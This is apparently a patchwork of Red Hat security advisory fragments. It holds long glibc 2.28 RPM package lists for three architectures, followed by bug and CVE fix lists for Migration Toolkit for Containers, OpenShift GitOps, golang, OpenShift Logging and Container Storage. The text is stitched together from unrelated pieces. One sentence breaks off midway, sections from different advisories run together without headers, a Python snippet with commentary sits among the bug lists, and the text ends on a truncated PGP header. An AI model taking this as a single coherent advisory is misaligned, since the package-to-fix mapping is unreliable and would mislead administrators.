glibc-langpack-tk-2.28-164.el8.ppc64le.rpm glibc-langpack-tl-2.28-164.el8.ppc64le.rpm glibc-langpack-tn-2.28-164.el8.ppc64le.rpm glibc-langpack-to-2.28-164.el8.ppc64le.rpm glibc-langpack-tpi-2.28-164.el8.ppc64le.rpm glibc-langpack-tr-2.28-164.el8.ppc64le.rpm glibc-langpack-ts-2.28-164.el8.ppc64le.rpm 
glibc-langpack-tt-2.28-164.el8.ppc64le.rpm glibc-langpack-ug-2.28-164.el8.ppc64le.rpm glibc-langpack-uk-2.28-164.el8.ppc64le.rpm glibc-langpack-unm-2.28-164.el8.ppc64le.rpm glibc-langpack-ur-2.28-164.el8.ppc64le.rpm glibc-langpack-uz-2.28-164.el8.ppc64le.rpm glibc-langpack-ve-2.28-164.el8.ppc64le.rpm glibc-langpack-vi-2.28-164.el8.ppc64le.rpm glibc-langpack-wa-2.28-164.el8.ppc64le.rpm glibc-langpack-wae-2.28-164.el8.ppc64le.rpm glibc-langpack-wal-2.28-164.el8.ppc64le.rpm glibc-langpack-wo-2.28-164.el8.ppc64le.rpm glibc-langpack-xh-2.28-164.el8.ppc64le.rpm glibc-langpack-yi-2.28-164.el8.ppc64le.rpm glibc-langpack-yo-2.28-164.el8.ppc64le.rpm glibc-langpack-yue-2.28-164.el8.ppc64le.rpm glibc-langpack-yuw-2.28-164.el8.ppc64le.rpm glibc-langpack-zh-2.28-164.el8.ppc64le.rpm glibc-langpack-zu-2.28-164.el8.ppc64le.rpm glibc-locale-source-2.28-164.el8.ppc64le.rpm glibc-minimal-langpack-2.28-164.el8.ppc64le.rpm libnsl-2.28-164.el8.ppc64le.rpm nscd-2.28-164.el8.ppc64le.rpm nss_db-2.28-164.el8.ppc64le.rpm
s390x: glibc-2.28-164.el8.s390x.rpm glibc-all-langpacks-2.28-164.el8.s390x.rpm glibc-common-2.28-164.el8.s390x.rpm glibc-debuginfo-2.28-164.el8.s390x.rpm glibc-debuginfo-common-2.28-164.el8.s390x.rpm glibc-devel-2.28-164.el8.s390x.rpm glibc-headers-2.28-164.el8.s390x.rpm glibc-langpack-aa-2.28-164.el8.s390x.rpm glibc-langpack-af-2.28-164.el8.s390x.rpm glibc-langpack-agr-2.28-164.el8.s390x.rpm glibc-langpack-ak-2.28-164.el8.s390x.rpm glibc-langpack-am-2.28-164.el8.s390x.rpm glibc-langpack-an-2.28-164.el8.s390x.rpm glibc-langpack-anp-2.28-164.el8.s390x.rpm glibc-langpack-ar-2.28-164.el8.s390x.rpm glibc-langpack-as-2.28-164.el8.s390x.rpm glibc-langpack-ast-2.28-164.el8.s390x.rpm glibc-langpack-ayc-2.28-164.el8.s390x.rpm glibc-langpack-az-2.28-164.el8.s390x.rpm glibc-langpack-be-2.28-164.el8.s390x.rpm glibc-langpack-bem-2.28-164.el8.s390x.rpm glibc-langpack-ber-2.28-164.el8.s390x.rpm glibc-langpack-bg-2.28-164.el8.s390x.rpm glibc-langpack-bhb-2.28-164.el8.s390x.rpm glibc-langpack-bho-2.28-164.el8.s390x.rpm glibc-langpack-bi-2.28-164.el8.s390x.rpm glibc-langpack-bn-2.28-164.el8.s390x.rpm glibc-langpack-bo-2.28-164.el8.s390x.rpm glibc-langpack-br-2.28-164.el8.s390x.rpm glibc-langpack-brx-2.28-164.el8.s390x.rpm glibc-langpack-bs-2.28-164.el8.s390x.rpm glibc-langpack-byn-2.28-164.el8.s390x.rpm glibc-langpack-ca-2.28-164.el8.s390x.rpm glibc-langpack-ce-2.28-164.el8.s390x.rpm glibc-langpack-chr-2.28-164.el8.s390x.rpm glibc-langpack-cmn-2.28-164.el8.s390x.rpm glibc-langpack-crh-2.28-164.el8.s390x.rpm glibc-langpack-cs-2.28-164.el8.s390x.rpm glibc-langpack-csb-2.28-164.el8.s390x.rpm glibc-langpack-cv-2.28-164.el8.s390x.rpm glibc-langpack-cy-2.28-164.el8.s390x.rpm glibc-langpack-da-2.28-164.el8.s390x.rpm glibc-langpack-de-2.28-164.el8.s390x.rpm glibc-langpack-doi-2.28-164.el8.s390x.rpm glibc-langpack-dsb-2.28-164.el8.s390x.rpm glibc-langpack-dv-2.28-164.el8.s390x.rpm glibc-langpack-dz-2.28-164.el8.s390x.rpm glibc-langpack-el-2.28-164.el8.s390x.rpm 
glibc-langpack-en-2.28-164.el8.s390x.rpm glibc-langpack-eo-2.28-164.el8.s390x.rpm glibc-langpack-es-2.28-164.el8.s390x.rpm glibc-langpack-et-2.28-164.el8.s390x.rpm glibc-langpack-eu-2.28-164.el8.s390x.rpm glibc-langpack-fa-2.28-164.el8.s390x.rpm glibc-langpack-ff-2.28-164.el8.s390x.rpm glibc-langpack-fi-2.28-164.el8.s390x.rpm glibc-langpack-fil-2.28-164.el8.s390x.rpm glibc-langpack-fo-2.28-164.el8.s390x.rpm glibc-langpack-fr-2.28-164.el8.s390x.rpm glibc-langpack-fur-2.28-164.el8.s390x.rpm glibc-langpack-fy-2.28-164.el8.s390x.rpm glibc-langpack-ga-2.28-164.el8.s390x.rpm glibc-langpack-gd-2.28-164.el8.s390x.rpm glibc-langpack-gez-2.28-164.el8.s390x.rpm glibc-langpack-gl-2.28-164.el8.s390x.rpm glibc-langpack-gu-2.28-164.el8.s390x.rpm glibc-langpack-gv-2.28-164.el8.s390x.rpm glibc-langpack-ha-2.28-164.el8.s390x.rpm glibc-langpack-hak-2.28-164.el8.s390x.rpm glibc-langpack-he-2.28-164.el8.s390x.rpm glibc-langpack-hi-2.28-164.el8.s390x.rpm glibc-langpack-hif-2.28-164.el8.s390x.rpm glibc-langpack-hne-2.28-164.el8.s390x.rpm glibc-langpack-hr-2.28-164.el8.s390x.rpm glibc-langpack-hsb-2.28-164.el8.s390x.rpm glibc-langpack-ht-2.28-164.el8.s390x.rpm glibc-langpack-hu-2.28-164.el8.s390x.rpm glibc-langpack-hy-2.28-164.el8.s390x.rpm glibc-langpack-ia-2.28-164.el8.s390x.rpm glibc-langpack-id-2.28-164.el8.s390x.rpm glibc-langpack-ig-2.28-164.el8.s390x.rpm glibc-langpack-ik-2.28-164.el8.s390x.rpm glibc-langpack-is-2.28-164.el8.s390x.rpm glibc-langpack-it-2.28-164.el8.s390x.rpm glibc-langpack-iu-2.28-164.el8.s390x.rpm glibc-langpack-ja-2.28-164.el8.s390x.rpm glibc-langpack-ka-2.28-164.el8.s390x.rpm glibc-langpack-kab-2.28-164.el8.s390x.rpm glibc-langpack-kk-2.28-164.el8.s390x.rpm glibc-langpack-kl-2.28-164.el8.s390x.rpm glibc-langpack-km-2.28-164.el8.s390x.rpm glibc-langpack-kn-2.28-164.el8.s390x.rpm glibc-langpack-ko-2.28-164.el8.s390x.rpm glibc-langpack-kok-2.28-164.el8.s390x.rpm glibc-langpack-ks-2.28-164.el8.s390x.rpm glibc-langpack-ku-2.28-164.el8.s390x.rpm 
glibc-langpack-kw-2.28-164.el8.s390x.rpm glibc-langpack-ky-2.28-164.el8.s390x.rpm glibc-langpack-lb-2.28-164.el8.s390x.rpm glibc-langpack-lg-2.28-164.el8.s390x.rpm glibc-langpack-li-2.28-164.el8.s390x.rpm glibc-langpack-lij-2.28-164.el8.s390x.rpm glibc-langpack-ln-2.28-164.el8.s390x.rpm glibc-langpack-lo-2.28-164.el8.s390x.rpm glibc-langpack-lt-2.28-164.el8.s390x.rpm glibc-langpack-lv-2.28-164.el8.s390x.rpm glibc-langpack-lzh-2.28-164.el8.s390x.rpm glibc-langpack-mag-2.28-164.el8.s390x.rpm glibc-langpack-mai-2.28-164.el8.s390x.rpm glibc-langpack-mfe-2.28-164.el8.s390x.rpm glibc-langpack-mg-2.28-164.el8.s390x.rpm glibc-langpack-mhr-2.28-164.el8.s390x.rpm glibc-langpack-mi-2.28-164.el8.s390x.rpm glibc-langpack-miq-2.28-164.el8.s390x.rpm glibc-langpack-mjw-2.28-164.el8.s390x.rpm glibc-langpack-mk-2.28-164.el8.s390x.rpm glibc-langpack-ml-2.28-164.el8.s390x.rpm glibc-langpack-mn-2.28-164.el8.s390x.rpm glibc-langpack-mni-2.28-164.el8.s390x.rpm glibc-langpack-mr-2.28-164.el8.s390x.rpm glibc-langpack-ms-2.28-164.el8.s390x.rpm glibc-langpack-mt-2.28-164.el8.s390x.rpm glibc-langpack-my-2.28-164.el8.s390x.rpm glibc-langpack-nan-2.28-164.el8.s390x.rpm glibc-langpack-nb-2.28-164.el8.s390x.rpm glibc-langpack-nds-2.28-164.el8.s390x.rpm glibc-langpack-ne-2.28-164.el8.s390x.rpm glibc-langpack-nhn-2.28-164.el8.s390x.rpm glibc-langpack-niu-2.28-164.el8.s390x.rpm glibc-langpack-nl-2.28-164.el8.s390x.rpm glibc-langpack-nn-2.28-164.el8.s390x.rpm glibc-langpack-nr-2.28-164.el8.s390x.rpm glibc-langpack-nso-2.28-164.el8.s390x.rpm glibc-langpack-oc-2.28-164.el8.s390x.rpm glibc-langpack-om-2.28-164.el8.s390x.rpm glibc-langpack-or-2.28-164.el8.s390x.rpm glibc-langpack-os-2.28-164.el8.s390x.rpm glibc-langpack-pa-2.28-164.el8.s390x.rpm glibc-langpack-pap-2.28-164.el8.s390x.rpm glibc-langpack-pl-2.28-164.el8.s390x.rpm glibc-langpack-ps-2.28-164.el8.s390x.rpm glibc-langpack-pt-2.28-164.el8.s390x.rpm glibc-langpack-quz-2.28-164.el8.s390x.rpm glibc-langpack-raj-2.28-164.el8.s390x.rpm 
glibc-langpack-ro-2.28-164.el8.s390x.rpm glibc-langpack-ru-2.28-164.el8.s390x.rpm glibc-langpack-rw-2.28-164.el8.s390x.rpm glibc-langpack-sa-2.28-164.el8.s390x.rpm glibc-langpack-sah-2.28-164.el8.s390x.rpm glibc-langpack-sat-2.28-164.el8.s390x.rpm glibc-langpack-sc-2.28-164.el8.s390x.rpm glibc-langpack-sd-2.28-164.el8.s390x.rpm glibc-langpack-se-2.28-164.el8.s390x.rpm glibc-langpack-sgs-2.28-164.el8.s390x.rpm glibc-langpack-shn-2.28-164.el8.s390x.rpm glibc-langpack-shs-2.28-164.el8.s390x.rpm glibc-langpack-si-2.28-164.el8.s390x.rpm glibc-langpack-sid-2.28-164.el8.s390x.rpm glibc-langpack-sk-2.28-164.el8.s390x.rpm glibc-langpack-sl-2.28-164.el8.s390x.rpm glibc-langpack-sm-2.28-164.el8.s390x.rpm glibc-langpack-so-2.28-164.el8.s390x.rpm glibc-langpack-sq-2.28-164.el8.s390x.rpm glibc-langpack-sr-2.28-164.el8.s390x.rpm glibc-langpack-ss-2.28-164.el8.s390x.rpm glibc-langpack-st-2.28-164.el8.s390x.rpm glibc-langpack-sv-2.28-164.el8.s390x.rpm glibc-langpack-sw-2.28-164.el8.s390x.rpm glibc-langpack-szl-2.28-164.el8.s390x.rpm glibc-langpack-ta-2.28-164.el8.s390x.rpm glibc-langpack-tcy-2.28-164.el8.s390x.rpm glibc-langpack-te-2.28-164.el8.s390x.rpm glibc-langpack-tg-2.28-164.el8.s390x.rpm glibc-langpack-th-2.28-164.el8.s390x.rpm glibc-langpack-the-2.28-164.el8.s390x.rpm glibc-langpack-ti-2.28-164.el8.s390x.rpm glibc-langpack-tig-2.28-164.el8.s390x.rpm glibc-langpack-tk-2.28-164.el8.s390x.rpm glibc-langpack-tl-2.28-164.el8.s390x.rpm glibc-langpack-tn-2.28-164.el8.s390x.rpm glibc-langpack-to-2.28-164.el8.s390x.rpm glibc-langpack-tpi-2.28-164.el8.s390x.rpm glibc-langpack-tr-2.28-164.el8.s390x.rpm glibc-langpack-ts-2.28-164.el8.s390x.rpm glibc-langpack-tt-2.28-164.el8.s390x.rpm glibc-langpack-ug-2.28-164.el8.s390x.rpm glibc-langpack-uk-2.28-164.el8.s390x.rpm glibc-langpack-unm-2.28-164.el8.s390x.rpm glibc-langpack-ur-2.28-164.el8.s390x.rpm glibc-langpack-uz-2.28-164.el8.s390x.rpm glibc-langpack-ve-2.28-164.el8.s390x.rpm glibc-langpack-vi-2.28-164.el8.s390x.rpm 
glibc-langpack-wa-2.28-164.el8.s390x.rpm glibc-langpack-wae-2.28-164.el8.s390x.rpm glibc-langpack-wal-2.28-164.el8.s390x.rpm glibc-langpack-wo-2.28-164.el8.s390x.rpm glibc-langpack-xh-2.28-164.el8.s390x.rpm glibc-langpack-yi-2.28-164.el8.s390x.rpm glibc-langpack-yo-2.28-164.el8.s390x.rpm glibc-langpack-yue-2.28-164.el8.s390x.rpm glibc-langpack-yuw-2.28-164.el8.s390x.rpm glibc-langpack-zh-2.28-164.el8.s390x.rpm glibc-langpack-zu-2.28-164.el8.s390x.rpm glibc-locale-source-2.28-164.el8.s390x.rpm glibc-minimal-langpack-2.28-164.el8.s390x.rpm libnsl-2.28-164.el8.s390x.rpm nscd-2.28-164.el8.s390x.rpm nss_db-2.28-164.el8.s390x.rpm
x86_64: glibc-2.28-164.el8.i686.rpm glibc-2.28-164.el8.x86_64.rpm glibc-all-langpacks-2.28-164.el8.x86_64.rpm glibc-common-2.28-164.el8.x86_64.rpm glibc-debuginfo-2.28-164.el8.i686.rpm glibc-debuginfo-2.28-164.el8.x86_64.rpm glibc-debuginfo-common-2.28-164.el8.i686.rpm glibc-debuginfo-common-2.28-164.el8.x86_64.rpm glibc-devel-2.28-164.el8.i686.rpm glibc-devel-2.28-164.el8.x86_64.rpm glibc-headers-2.28-164.el8.i686.rpm glibc-headers-2.28-164.el8.x86_64.rpm glibc-langpack-aa-2.28-164.el8.x86_64.rpm glibc-langpack-af-2.28-164.el8.x86_64.rpm glibc-langpack-agr-2.28-164.el8.x86_64.rpm glibc-langpack-ak-2.28-164.el8.x86_64.rpm glibc-langpack-am-2.28-164.el8.x86_64.rpm glibc-langpack-an-2.28-164.el8.x86_64.rpm glibc-langpack-anp-2.28-164.el8.x86_64.rpm glibc-langpack-ar-2.28-164.el8.x86_64.rpm glibc-langpack-as-2.28-164.el8.x86_64.rpm glibc-langpack-ast-2.28-164.el8.x86_64.rpm glibc-langpack-ayc-2.28-164.el8.x86_64.rpm glibc-langpack-az-2.28-164.el8.x86_64.rpm glibc-langpack-be-2.28-164.el8.x86_64.rpm glibc-langpack-bem-2.28-164.el8.x86_64.rpm glibc-langpack-ber-2.28-164.el8.x86_64.rpm glibc-langpack-bg-2.28-164.el8.x86_64.rpm glibc-langpack-bhb-2.28-164.el8.x86_64.rpm glibc-langpack-bho-2.28-164.el8.x86_64.rpm glibc-langpack-bi-2.28-164.el8.x86_64.rpm glibc-langpack-bn-2.28-164.el8.x86_64.rpm glibc-langpack-bo-2.28-164.el8.x86_64.rpm glibc-langpack-br-2.28-164.el8.x86_64.rpm glibc-langpack-brx-2.28-164.el8.x86_64.rpm glibc-langpack-bs-2.28-164.el8.x86_64.rpm glibc-langpack-byn-2.28-164.el8.x86_64.rpm glibc-langpack-ca-2.28-164.el8.x86_64.rpm glibc-langpack-ce-2.28-164.el8.x86_64.rpm glibc-langpack-chr-2.28-164.el8.x86_64.rpm glibc-langpack-cmn-2.28-164.el8.x86_64.rpm glibc-langpack-crh-2.28-164.el8.x86_64.rpm glibc-langpack-cs-2.28-164.el8.x86_64.rpm glibc-langpack-csb-2.28-164.el8.x86_64.rpm glibc-langpack-cv-2.28-164.el8.x86_64.rpm glibc-langpack-cy-2.28-164.el8.x86_64.rpm glibc-langpack-da-2.28-164.el8.x86_64.rpm glibc-langpack-de-2.28-164.el8.x86_64.rpm 
glibc-langpack-doi-2.28-164.el8.x86_64.rpm glibc-langpack-dsb-2.28-164.el8.x86_64.rpm glibc-langpack-dv-2.28-164.el8.x86_64.rpm glibc-langpack-dz-2.28-164.el8.x86_64.rpm glibc-langpack-el-2.28-164.el8.x86_64.rpm glibc-langpack-en-2.28-164.el8.x86_64.rpm glibc-langpack-eo-2.28-164.el8.x86_64.rpm glibc-langpack-es-2.28-164.el8.x86_64.rpm glibc-langpack-et-2.28-164.el8.x86_64.rpm glibc-langpack-eu-2.28-164.el8.x86_64.rpm glibc-langpack-fa-2.28-164.el8.x86_64.rpm glibc-langpack-ff-2.28-164.el8.x86_64.rpm glibc-langpack-fi-2.28-164.el8.x86_64.rpm glibc-langpack-fil-2.28-164.el8.x86_64.rpm glibc-langpack-fo-2.28-164.el8.x86_64.rpm glibc-langpack-fr-2.28-164.el8.x86_64.rpm glibc-langpack-fur-2.28-164.el8.x86_64.rpm glibc-langpack-fy-2.28-164.el8.x86_64.rpm glibc-langpack-ga-2.28-164.el8.x86_64.rpm glibc-langpack-gd-2.28-164.el8.x86_64.rpm glibc-langpack-gez-2.28-164.el8.x86_64.rpm glibc-langpack-gl-2.28-164.el8.x86_64.rpm glibc-langpack-gu-2.28-164.el8.x86_64.rpm glibc-langpack-gv-2.28-164.el8.x86_64.rpm glibc-langpack-ha-2.28-164.el8.x86_64.rpm glibc-langpack-hak-2.28-164.el8.x86_64.rpm glibc-langpack-he-2.28-164.el8.x86_64.rpm glibc-langpack-hi-2.28-164.el8.x86_64.rpm glibc-langpack-hif-2.28-164.el8.x86_64.rpm glibc-langpack-hne-2.28-164.el8.x86_64.rpm glibc-langpack-hr-2.28-164.el8.x86_64.rpm glibc-langpack-hsb-2.28-164.el8.x86_64.rpm glibc-langpack-ht-2.28-164.el8.x86_64.rpm glibc-langpack-hu-2.28-164.el8.x86_64.rpm glibc-langpack-hy-2.28-164.el8.x86_64.rpm glibc-langpack-ia-2.28-164.el8.x86_64.rpm glibc-langpack-id-2.28-164.el8.x86_64.rpm glibc-langpack-ig-2.28-164.el8.x86_64.rpm glibc-langpack-ik-2.28-164.el8.x86_64.rpm glibc-langpack-is-2.28-164.el8.x86_64.rpm glibc-langpack-it-2.28-164.el8.x86_64.rpm glibc-langpack-iu-2.28-164.el8.x86_64.rpm glibc-langpack-ja-2.28-164.el8.x86_64.rpm glibc-langpack-ka-2.28-164.el8.x86_64.rpm glibc-langpack-kab-2.28-164.el8.x86_64.rpm glibc-langpack-kk-2.28-164.el8.x86_64.rpm glibc-langpack-kl-2.28-164.el8.x86_64.rpm 
glibc-langpack-km-2.28-164.el8.x86_64.rpm glibc-langpack-kn-2.28-164.el8.x86_64.rpm glibc-langpack-ko-2.28-164.el8.x86_64.rpm glibc-langpack-kok-2.28-164.el8.x86_64.rpm glibc-langpack-ks-2.28-164.el8.x86_64.rpm glibc-langpack-ku-2.28-164.el8.x86_64.rpm glibc-langpack-kw-2.28-164.el8.x86_64.rpm glibc-langpack-ky-2.28-164.el8.x86_64.rpm glibc-langpack-lb-2.28-164.el8.x86_64.rpm glibc-langpack-lg-2.28-164.el8.x86_64.rpm glibc-langpack-li-2.28-164.el8.x86_64.rpm glibc-langpack-lij-2.28-164.el8.x86_64.rpm glibc-langpack-ln-2.28-164.el8.x86_64.rpm glibc-langpack-lo-2.28-164.el8.x86_64.rpm glibc-langpack-lt-2.28-164.el8.x86_64.rpm glibc-langpack-lv-2.28-164.el8.x86_64.rpm glibc-langpack-lzh-2.28-164.el8.x86_64.rpm glibc-langpack-mag-2.28-164.el8.x86_64.rpm glibc-langpack-mai-2.28-164.el8.x86_64.rpm glibc-langpack-mfe-2.28-164.el8.x86_64.rpm glibc-langpack-mg-2.28-164.el8.x86_64.rpm glibc-langpack-mhr-2.28-164.el8.x86_64.rpm glibc-langpack-mi-2.28-164.el8.x86_64.rpm glibc-langpack-miq-2.28-164.el8.x86_64.rpm glibc-langpack-mjw-2.28-164.el8.x86_64.rpm glibc-langpack-mk-2.28-164.el8.x86_64.rpm glibc-langpack-ml-2.28-164.el8.x86_64.rpm glibc-langpack-mn-2.28-164.el8.x86_64.rpm glibc-langpack-mni-2.28-164.el8.x86_64.rpm glibc-langpack-mr-2.28-164.el8.x86_64.rpm glibc-langpack-ms-2.28-164.el8.x86_64.rpm glibc-langpack-mt-2.28-164.el8.x86_64.rpm glibc-langpack-my-2.28-164.el8.x86_64.rpm glibc-langpack-nan-2.28-164.el8.x86_64.rpm glibc-langpack-nb-2.28-164.el8.x86_64.rpm glibc-langpack-nds-2.28-164.el8.x86_64.rpm glibc-langpack-ne-2.28-164.el8.x86_64.rpm glibc-langpack-nhn-2.28-164.el8.x86_64.rpm glibc-langpack-niu-2.28-164.el8.x86_64.rpm glibc-langpack-nl-2.28-164.el8.x86_64.rpm glibc-langpack-nn-2.28-164.el8.x86_64.rpm glibc-langpack-nr-2.28-164.el8.x86_64.rpm glibc-langpack-nso-2.28-164.el8.x86_64.rpm glibc-langpack-oc-2.28-164.el8.x86_64.rpm glibc-langpack-om-2.28-164.el8.x86_64.rpm glibc-langpack-or-2.28-164.el8.x86_64.rpm glibc-langpack-os-2.28-164.el8.x86_64.rpm 
glibc-langpack-pa-2.28-164.el8.x86_64.rpm glibc-langpack-pap-2.28-164.el8.x86_64.rpm glibc-langpack-pl-2.28-164.el8.x86_64.rpm glibc-langpack-ps-2.28-164.el8.x86_64.rpm glibc-langpack-pt-2.28-164.el8.x86_64.rpm glibc-langpack-quz-2.28-164.el8.x86_64.rpm glibc-langpack-raj-2.28-164.el8.x86_64.rpm glibc-langpack-ro-2.28-164.el8.x86_64.rpm glibc-langpack-ru-2.28-164.el8.x86_64.rpm glibc-langpack-rw-2.28-164.el8.x86_64.rpm glibc-langpack-sa-2.28-164.el8.x86_64.rpm glibc-langpack-sah-2.28-164.el8.x86_64.rpm glibc-langpack-sat-2.28-164.el8.x86_64.rpm glibc-langpack-sc-2.28-164.el8.x86_64.rpm glibc-langpack-sd-2.28-164.el8.x86_64.rpm glibc-langpack-se-2.28-164.el8.x86_64.rpm glibc-langpack-sgs-2.28-164.el8.x86_64.rpm glibc-langpack-shn-2.28-164.el8.x86_64.rpm glibc-langpack-shs-2.28-164.el8.x86_64.rpm glibc-langpack-si-2.28-164.el8.x86_64.rpm glibc-langpack-sid-2.28-164.el8.x86_64.rpm glibc-langpack-sk-2.28-164.el8.x86_64.rpm glibc-langpack-sl-2.28-164.el8.x86_64.rpm glibc-langpack-sm-2.28-164.el8.x86_64.rpm glibc-langpack-so-2.28-164.el8.x86_64.rpm glibc-langpack-sq-2.28-164.el8.x86_64.rpm glibc-langpack-sr-2.28-164.el8.x86_64.rpm glibc-langpack-ss-2.28-164.el8.x86_64.rpm glibc-langpack-st-2.28-164.el8.x86_64.rpm glibc-langpack-sv-2.28-164.el8.x86_64.rpm glibc-langpack-sw-2.28-164.el8.x86_64.rpm glibc-langpack-szl-2.28-164.el8.x86_64.rpm glibc-langpack-ta-2.28-164.el8.x86_64.rpm glibc-langpack-tcy-2.28-164.el8.x86_64.rpm glibc-langpack-te-2.28-164.el8.x86_64.rpm glibc-langpack-tg-2.28-164.el8.x86_64.rpm glibc-langpack-th-2.28-164.el8.x86_64.rpm glibc-langpack-the-2.28-164.el8.x86_64.rpm glibc-langpack-ti-2.28-164.el8.x86_64.rpm glibc-langpack-tig-2.28-164.el8.x86_64.rpm glibc-langpack-tk-2.28-164.el8.x86_64.rpm glibc-langpack-tl-2.28-164.el8.x86_64.rpm glibc-langpack-tn-2.28-164.el8.x86_64.rpm glibc-langpack-to-2.28-164.el8.x86_64.rpm glibc-langpack-tpi-2.28-164.el8.x86_64.rpm glibc-langpack-tr-2.28-164.el8.x86_64.rpm glibc-langpack-ts-2.28-164.el8.x86_64.rpm 
glibc-langpack-tt-2.28-164.el8.x86_64.rpm glibc-langpack-ug-2.28-164.el8.x86_64.rpm glibc-langpack-uk-2.28-164.el8.x86_64.rpm glibc-langpack-unm-2.28-164.el8.x86_64.rpm glibc-langpack-ur-2.28-164.el8.x86_64.rpm glibc-langpack-uz-2.28-164.el8.x86_64.rpm glibc-langpack-ve-2.28-164.el8.x86_64.rpm glibc-langpack-vi-2.28-164.el8.x86_64.rpm glibc-langpack-wa-2.28-164.el8.x86_64.rpm glibc-langpack-wae-2.28-164.el8.x86_64.rpm glibc-langpack-wal-2.28-164.el8.x86_64.rpm glibc-langpack-wo-2.28-164.el8.x86_64.rpm glibc-langpack-xh-2.28-164.el8.x86_64.rpm glibc-langpack-yi-2.28-164.el8.x86_64.rpm glibc-langpack-yo-2.28-164.el8.x86_64.rpm glibc-langpack-yue-2.28-164.el8.x86_64.rpm glibc-langpack-yuw-2.28-164.el8.x86_64.rpm glibc-langpack-zh-2.28-164.el8.x86_64.rpm glibc-langpack-zu-2.28-164.el8.x86_64.rpm glibc-locale-source-2.28-164.el8.x86_64.rpm glibc-minimal-langpack-2.28-164.el8.x86_64.rpm libnsl-2.28-164.el8.i686.rpm libnsl-2.28-164.el8.x86_64.rpm nscd-2.28-164.el8.x86_64.rpm nss_db-2.28-164.el8.i686.rpm nss_db-2.28-164.el8.x86_64.rpm
Red Hat Enterprise Linux CRB (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Summary:
The Migration Toolkit for Containers (MTC) 1.6.3 is now available.
- Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.
- Bugs fixed (https://bugzilla.redhat.com/):
2019088 - "MigrationController" CR displays syntax error when unquiescing applications 2021666 - Route name longer than 63 characters causes direct volume migration to fail 2021668 - "MigrationController" CR ignores the "cluster_subdomain" value for direct volume migration routes 2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC) 2024966 - Manifests not used by Operator Lifecycle Manager must be removed from the MTC 1.6 Operator image 2027196 - "migration-controller" pod goes into "CrashLoopBackoff" state if an invalid registry route is entered on the "Clusters" page of the web console 2027382 - "Copy oc describe/oc logs" window does not close automatically after timeout 2028841 - "rsync-client" container fails during direct volume migration with "Address family not supported by protocol" error 2031793 - "migration-controller" pod goes into "CrashLoopBackOff" state if "MigPlan" CR contains an invalid "includedResources" resource 2039852 - "migration-controller" pod goes into "CrashLoopBackOff" state if "MigPlan" CR contains an invalid "destMigClusterRef" or "srcMigClusterRef"
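The 63-character route-name limit in the bug list above comes from the DNS label length cap in RFC 1035: each dot-separated label in a hostname may be at most 63 octets. A minimal, hypothetical pre-flight check for generated route names could look like this (the function name is illustrative, not part of MTC):

```python
# Hypothetical pre-flight check: OpenShift route names end up as DNS labels,
# and RFC 1035 caps a single DNS label at 63 octets.
MAX_DNS_LABEL = 63

def route_name_ok(name: str) -> bool:
    """Return True if `name` fits in one DNS label."""
    return 0 < len(name) <= MAX_DNS_LABEL

print(route_name_ok("dvm-route-" + "a" * 50))  # 60 chars -> True
print(route_name_ok("dvm-route-" + "a" * 60))  # 70 chars -> False
```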
- Description:
Red Hat OpenShift GitOps is a declarative way to implement continuous deployment for cloud native applications.
- Bugs fixed (https://bugzilla.redhat.com/):
2050826 - CVE-2022-24348 gitops: Path traversal and dereference of symlinks when passing Helm value files
- Bugs fixed (https://bugzilla.redhat.com/):
1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment
- JIRA issues fixed (https://issues.jboss.org/):
LOG-1168 - Disable hostname verification in syslog TLS settings
LOG-1235 - Using HTTPS without a secret does not translate into the correct 'scheme' value in Fluentd
LOG-1375 - ssl_ca_cert should be optional
LOG-1378 - CLO should support sasl_plaintext(Password over http)
LOG-1392 - In fluentd config, flush_interval can't be set with flush_mode=immediate
LOG-1494 - Syslog output is serializing json incorrectly
LOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server
LOG-1575 - Rejected by Elasticsearch and unexpected json-parsing
LOG-1735 - Regression introducing flush_at_shutdown
LOG-1774 - The collector logs should be excluded in fluent.conf
LOG-1776 - fluentd total_limit_size sets value beyond available space
LOG-1822 - OpenShift Alerting Rules Style-Guide Compliance
LOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled
LOG-1862 - Unsupported kafka parameters when enabled Kafka SASL
LOG-1903 - Fix the Display of ClusterLogging type in OLM
LOG-1911 - CLF API changes to Opt-in to multiline error detection
LOG-1918 - Alert FluentdNodeDown always firing
LOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding
- Description:
Red Hat OpenShift Container Storage is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Container Storage is highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Container Storage provides a multicloud data management service with an S3 compatible API.
Bug Fix(es):
- Previously, when the namespace store target was deleted, no alert was triggered for the namespace bucket because of an issue in calculating the namespace bucket health. With this update, the issue in calculating the namespace bucket health is fixed and alerts are triggered as expected. (BZ#1993873)
- Previously, the Multicloud Object Gateway (MCG) components performed slowly, and there was a lot of pressure on the MCG components due to non-optimized database queries. With this update, the non-optimized database queries are fixed, which reduces the compute resources and time taken for queries.
- Bugs fixed (https://bugzilla.redhat.com/):
1993873 - [4.8.z clone] Alert NooBaaNamespaceBucketErrorState is not triggered when namespacestore's target bucket is deleted 2006958 - CVE-2020-26301 nodejs-ssh2: Command injection by calling vulnerable method with untrusted input
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
